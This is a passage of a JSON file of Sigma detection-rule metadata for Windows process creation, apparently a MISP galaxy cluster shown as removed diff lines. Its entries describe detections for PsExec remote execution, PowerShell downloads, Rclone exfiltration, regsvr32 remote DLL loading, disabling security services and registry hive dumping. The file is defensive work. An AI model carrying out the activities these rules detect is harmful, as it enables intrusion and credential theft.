"proc_creation_win_susp_psexec_eula.yml", - "author": "omkar72", - "level": "medium", - "falsepositive": [ - "Administrative scripts." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", - "value": "PsExec Service Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc.yml", - "author": "Romaissa Adjailia, FLorian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. 
the administrator account)", - "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", - "value": "PsExec Service Execution as LOCAL SYSTEM", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc_as_system.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "value": "Renamed PsExec Service Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/21", - "filename": "proc_creation_win_susp_psexesvc_renamed.yml", - "author": "FLorian Roth", - "level": "high", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", - "value": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - 
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/11/23", - "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", - "uuid": "207b0396-3689-42d9-8399-4222658efc99", - "value": "PsExec/PAExec Flags", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2021/05/22", - "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", - "author": "Florian Roth, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", - "uuid": 
"aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "value": "Suspicious Use of PsLogList", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", - "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" - ], - "creation_date": "2021/12/18", - "filename": "proc_creation_win_susp_psloglist.yml", - "author": "Nasreddine Bencherchali @nas_bench", - "level": "medium", - "falsepositive": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", - "value": "Psr.exe Capture Screenshots", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Psr/", - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ], - "creation_date": "2019/10/12", - "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a 
suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", - "value": "PowerShell Script Run in AppData", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1082851155481288706", - "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/01/09", - "filename": "proc_creation_win_susp_ps_appdata.yml", - "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", - "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "value": "PowerShell DownloadFile", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1104", - "attack.t1105" - ], - "creation_date": "2020/08/28", - "filename": "proc_creation_win_susp_ps_downloadfile.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "value": "Suspicious PowerShell Obfuscated PowerShell Code", - 
"meta": { - "refs": [ - "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/07/11", - "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", - "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "value": "Use Radmin Viewer Utility", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", - "https://www.radmin.fr/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" - ], - "creation_date": "2022/01/22", - "filename": "proc_creation_win_susp_radmin.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", - "value": "Rar Usage with Password and Compression Level", - "meta": { - "refs": [ - "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", - "https://ss64.com/bash/rar.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ], - "creation_date": "2020/05/12", - "filename": "proc_creation_win_susp_rar_flags.yml", - "author": "@ROxPinTeddy", - "level": "high", - "falsepositive": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious process related to rasdial.exe", - "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "value": "Suspicious RASdial Activity", - "meta": { - "refs": [ - "https://twitter.com/subTee/status/891298217907830785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_rasdial_activity.yml", - "author": "juju4", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to 
escalate privileges to LOCAL SYSTEM", - "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "value": "Suspicious RazerInstaller Explorer Subprocess", - "meta": { - "refs": [ - "https://twitter.com/j0nh4t/status/1429049506021138437", - "https://streamable.com/q2dsji", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1553" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", - "author": "Florian Roth, Maxime Thiebaut", - "level": "high", - "falsepositive": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "value": "Rclone Execution via Command Line or PowerShell", - "meta": { - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", - "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", - "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2021/05/10", - "filename": "proc_creation_win_susp_rclone_execution.yml", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", - "level": "high", - "falsepositive": [ - 
"Legitimate RClone use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", - "value": "Recon Information for Export with Command Prompt", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" - ], - "tags": [ - "attack.collection", - "attack.t1119" - ], - "creation_date": "2021/07/30", - "filename": "proc_creation_win_susp_recon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a set of suspicious network related commands often used in recon stages", - "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "value": "Network Reconnaissance Activity", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], - "creation_date": "2022/02/07", - "filename": "proc_creation_win_susp_recon_network_activity.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", - "value": 
"Regedit as Trusted Installer", - "meta": { - "refs": [ - "https://twitter.com/1kwpeter/status/1397816101455765504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2021/05/27", - "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", - "value": "DLL Execution Via Register-cimprovider.exe", - "meta": { - "refs": [ - "https://twitter.com/PhilipTsukerman/status/992021361106268161", - "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_susp_register_cimprovider.yml", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", - "value": "Suspicious Registration via cscript.exe", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", - "https://ss64.com/vb/cscript.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - 
"creation_date": "2021/11/05", - "filename": "proc_creation_win_susp_registration_via_cscript.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects various anomalies in relation to regsvr32.exe", - "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "value": "Regsvr32 Anomaly", - "meta": { - "refs": [ - "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", - "author": "Florian Roth, oscd.community, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", - "value": "Regsvr32 Flags Anomaly", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2019/07/13", - "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag 
combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "value": "Suspicious Regsvr32 HTTP IP Pattern", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", - "https://twitter.com/tccontre18/status/1480950986650832903", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "FQDNs that start with a number" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", - "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", - "value": "Suspicious Regsvr32 Execution With Image Extension", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2021/11/29", - "filename": "proc_creation_win_susp_regsvr32_image.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", - "uuid": "50919691-7302-437f-8e10-1fe088afa145", - "value": "Regsvr32 Command Line 
Without DLL", - "meta": { - "refs": [ - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" - ], - "creation_date": "2019/07/17", - "filename": "proc_creation_win_susp_regsvr32_no_dll.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", - "value": "Suspicious Regsvr32 Execution From Remote Share", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_remote_share.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/10/31", - "filename": "proc_creation_win_susp_regsvr32_remote_share.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", - "uuid": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", - "value": "Regsvr32 Spawning Explorer", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-april-2022/", - "https://www.echotrail.io/insights/search/regsvr32.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_spawn_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.010" - ], - "creation_date": "2022/05/05", - "filename": 
"proc_creation_win_susp_regsvr32_spawn_explorer.yml", - "author": "elhoim", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "uuid": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "value": "Reg Add Suspicious Paths", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_add.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_susp_reg_add.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare legitimate add to registry via cli (to these locations)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "uuid": "0e0255bf-2548-47b8-9582-c0955c9283f5", - "value": "Suspicious Reg Add BitLocker", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2021/11/15", - "filename": "proc_creation_win_susp_reg_bitlocker.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - 
"logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", - "value": "Reg Disable Security Service", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/1415295021041979392", - "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", - "https://vms.drweb.fr/virus/?i=24144899", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", - "author": "Florian Roth, John Lambert (idea), elhoim", - "level": "high", - "falsepositive": [ - "Unknown", - "Other security solution installers" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", - "uuid": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", - "value": "Suspicious Reg Add Open Command", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_susp_reg_open_command.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a renamed Adfind.exe. 
AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "value": "Renamed AdFind Detection", - "meta": { - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ], - "creation_date": "2022/08/21", - "filename": "proc_creation_win_susp_renamed_adfind.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "uuid": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "value": "Renamed CreateDump Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://twitter.com/bopin2020/status/1366400799199272960", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - 
"creation_date": "2022/09/20", - "filename": "proc_creation_win_susp_renamed_createdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Command lines that use the same flags" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "uuid": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "value": "Renamed ZOHO Dctask64", - "meta": { - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" - ], - "creation_date": "2020/01/28", - "filename": "proc_creation_win_susp_renamed_dctask64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown yet" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious renamed SysInternals DebugView execution", - "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "value": "Renamed SysInternals Debug View", - "meta": { - "refs": [ - "https://www.epicturla.com/blog/sysinturla", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2020/05/28", - "filename": "proc_creation_win_susp_renamed_debugview.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - 
